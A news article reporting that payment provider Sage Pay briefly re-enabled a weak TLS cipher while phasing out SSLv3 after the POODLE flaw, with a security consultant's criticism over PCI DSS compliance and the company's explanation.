Online payment service Sage Pay has been fingered for temporarily reducing its security while revamping its site security.
Security consultant Paul Moore noticed that the Sage Pay website was briefly running a weak cipher last week.
More ReadingHalf of UK financial institutions vulnerable to well-known crypto flawsThat shot you heard? SSLv3 is now DEADBarclays, Halifax and Tesco still being gnawed by POODLEE-commerce enterprises gently told to update those protocols ... or elseUK banks ill-prepared for return of the rabid POODLE
The issue was quickly corrected after Moore went public with his concerns on Tuesday. He nonetheless remains critical, arguing that the cryptographic downgrade took Sage Pay out of compliance with the credit card industry's PCI DSS rules.
In response to queries from El Reg, Sage Pay explained that the temporary downgrade had happened in order to avoid leaving customers with older systems behind in the process of updating systems in response to the recent POODLE vulnerability.
We have been working over the last few months to mitigate the risks of Poodle to our customer base.
In terms of the Poodle vulnerability, we began the disabling of SSLv3 on our live system from Friday 30th January. As this is a batch roll out, this work will be continuing over the next few weeks.
We have been notifying customers of this work via a range of communications about this ranging from emails, blogs [example here], direct mailers and banners in the Sage Pay admin area.
During the work undertaken the fix which we put in place, a weaker TLS cipher, caused a knock-on effect to several customers, impacting their processing.
We switched the cipher back on as part of a short term fix to mitigate the impact whilst we worked with the affected customers. This was removed this morning [Tuesday] and a permanent solution was put in place.
Moore said Sage Pay's response is not unreasonable but it would have done better to inconvenience those using obsolete systems such as Windows XP, rather than breaching PCI compliance rules.
"That’s mostly accurate," Moore told El Reg. "They disabled the weak cipher which effectively crippled customers using Windows XP/embedded devices, so they switched the weak cipher back on."
"Although I understand the reason behind it, that’s not the point. The fact they accepted payments from those devices proves they knowingly enabled the weak cipher to begin with, despite the impact upon their PCI compliance."
The POODLE (Padding Oracle On Downgraded Legacy Encryption) security flaw was initially thought to affect only the obsolete – but still widely used – Secure Sockets Layer (SSL) 3.0 crypto algorithm when it was discovered in October. Follow-up research revealed that the POODLE flaw also affects versions of TLS (Transport Layer Security).
As previously reported banks were left scrambling to update, leaving UK banks' web site traffic potentially open to eavesdropping. Moore agreed with comments by another security expert, Virus Bulletin editor Martijn Grooten, that it's unlikely that anyone would have been able to come up with a working POODLE attack against SagePay – while reiterating that's doesn't excuse what Sage had done.
"It makes no difference how viable the attack is... it's that it's a clear breach of PCI regulations. Twice," Moore said during a discussion about the issue on Twitter.
Sage Pay is an independent payment service provider that boasts more than 50,000 customers. The business, a subsidiary of accounting software firm Sage, makes its possible for clients to accept payments online or over the phone. ®